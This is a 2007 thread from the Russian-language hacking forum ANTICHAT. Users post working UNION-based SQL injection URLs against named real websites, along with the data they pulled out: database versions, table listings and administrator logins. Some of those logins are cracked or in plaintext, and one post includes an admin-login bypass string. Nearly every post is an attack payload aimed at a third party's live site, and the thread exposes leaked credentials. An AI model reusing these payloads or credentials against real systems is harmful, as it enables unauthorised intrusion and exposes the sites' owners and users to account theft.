ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.12.2007, 17:00
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Официальный сайт НЗШВ
Код:
http://www.nzshv.ru/interview.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
Код:
Database error: Invalid SQL: select * from interview where id=-1 union select 1,2,3,4,5,database(),7,8/*
MySQL Error: 1267 (Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION')
Session halted.
|
|
|
05.12.2007, 18:03
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
Сообщение от Mike 007
Официальный сайт НЗШВ
Код:
http://www.nzshv.ru/interview.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
Вот так
Код:
http://www.nzshv.ru/interview.php?id=-1+union+select+1,2,convert(concat(version(),0x3a,database(),0x3a,user())+using+cp1251),4,5,6,7,8/*
Последний раз редактировалось v1ru$; 05.12.2007 в 18:05..
|
|
|
|
05.12.2007, 18:23
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Официальный сайт клуба "Бодрость"
Код:
http://www.bodrost.h1.ru/results.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6/*
bodrost6@172.16.1.3
4.0.18
p.s: я не стал подбирать таблици, т.к. сайт сильно тормозит =(
|
|
|
|
05.12.2007, 21:53
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
nvsaratov.ru - газета "Новые Времена"
случайно наткнулся на сей сайт...
Код:
http://nvsaratov.ru/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,version(),6,user(),8,9,10,11/*
4.1.22-log nvsaratov@hosting.overta.ru
думал се... а нет. тыкнув кавычкой в админке вылезла ошибка:
Ошибка в запросе: SELECT id, ip, login, pass, name, email FROM __admin WHERE LOWER(login)=LOWER('' or 1=1/*') AND ((pass='21232f297a57a5a743894a0e4a801fc3' AND is_encoded=1) OR (pass='admin' AND is_encoded=0)) LIMIT 1
из которой сразу видны таблица и колонки =)
Код:
http://nvsaratov.ru/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,concat(login,char(58),pass,char(58),email,char(58),name),6,7,8,9,10,11+from+__admin/*
webmaster:824dbff1455fe6ed2d753200a889fbb1:nv.sara tov@overta.ru:Новые времена
admin:0b944a04224b108c29b460245a13664e:design@over ta:Администратор
собсно расшифровывать пароли мы не будем... а исходя из вышеупомянутой ошибки, составим запрос =)
Код:
0b944a04224b108c29b460245a13664e' AND is_encoded=1) OR (pass='12345' AND is_encoded=0)) LIMIT 1/*
куда его вставлять додумывайте сами... вуаля мы в админке =) п.с. информация о уязвимости была отправлена
|
|
|
|
06.12.2007, 00:40
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
БД 4...перебором нашёл мемберов
Код HTML:
http://www.gilbo.ru/index.php?page=liderlist&art=-1255'+UNION+SELECT+1,2,concat(nick,0x3a,pass),4,5,6,7+FROM+members+limit+1,1/*
Админка
Код HTML:
http://www.gilbo.ru/admin.php
|
|
|
|
06.12.2007, 00:49
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
EEстонский JaZZ
www.jazzkaar.ee
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+--+
4.1.13-Debian_0.dotdeb.0-log
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+limit+0,1+--+
Есч0 и сбрутил =)
Код:
testuser:179ad45c6ce2cb97cf1029e212046e81:testpass
kasutaja:878e9103c2f839fab4027a12b1b33e8c:kasutaja
Идем дальше..
ПОЗОР ДНЯ
Корпорация ЮНИ
Специализация: Информационные технологии и Информационная Безопасность.
www.uni.ru
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+--+
5.0.26-standard-log
Табла users.
Столбцы:
uid
user
password
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,uid,user,password),11,12+from+itg.users+--+
Дальше..
ONLINE JOBS
www.onlinejobs.ru
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,version(),3,4,5+--+
5.0.22
Удобный вывод всех таблиц.
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+--+
Интересные:
admins
adminip
users
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,concat_ws(0x3a,id,name,pass,mail,admins),3,4,5+from+jobsmarket_job.admins+--+
Код:
1:adminyu:1q2wasdfre:donguan@bk.ru:0
|
|
|
|
06.12.2007, 03:12
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
Рейтинг серверов Linage II
http://top.l2info.net/index.php?go=in&id=279 and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21 from information_schema.tables/*
|
|
|
|
06.12.2007, 13:57
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
Сообщение от ZAMUT
EEстонский JaZZ
www.jazzkaar.ee
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+--+
4.1.13-Debian_0.dotdeb.0-log
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+limit+0,1+--+
Есч0 и сбрутил =)
Код:
testuser:179ad45c6ce2cb97cf1029e212046e81:testpass
kasutaja:878e9103c2f839fab4027a12b1b33e8c:kasutaja
Идем дальше..
ПОЗОР ДНЯ
Корпорация ЮНИ
Специализация: Информационные технологии и Информационная Безопасность.
www.uni.ru
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+--+
5.0.26-standard-log
Табла users.
Столбцы:
uid
user
password
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,uid,user,password),11,12+from+itg.users+--+
Дальше..
ONLINE JOBS
www.onlinejobs.ru
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,version(),3,4,5+--+
5.0.22
Удобный вывод всех таблиц.
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+--+
Интересные:
admins
adminip
users
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,concat_ws(0x3a,id,name,pass,mail,admins),3,4,5+from+jobsmarket_job.admins+--+
Код:
1:adminyu:1q2wasdfre:donguan@bk.ru:0
http://onlinejobs.ru:2222/CMD_LOGIN - админка, но пароль не подошел 
|
|
|
|
06.12.2007, 16:34
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Код:
http://www.cyberbrest.com/index.php?page=files&id=-1+union+select+1,2,3,4,5,concat_ws(char(0x20,0x3a,0x20),login,password,email),7+from+user/*
|
|
|
|
06.12.2007, 18:35
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
www.abruzzoverdeblu.it
Код:
http://www.abruzzoverdeblu.it/?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database(),0x3a,user(),0x3a,version(),0x3a),7,concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+abruzzov_db.utenti/*
Расскрутил до конца!!!
admin : bluver02
а админку не нашёл =)))
abruzzov_user1@localhost
5.0.45-community
abruzzov_db
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
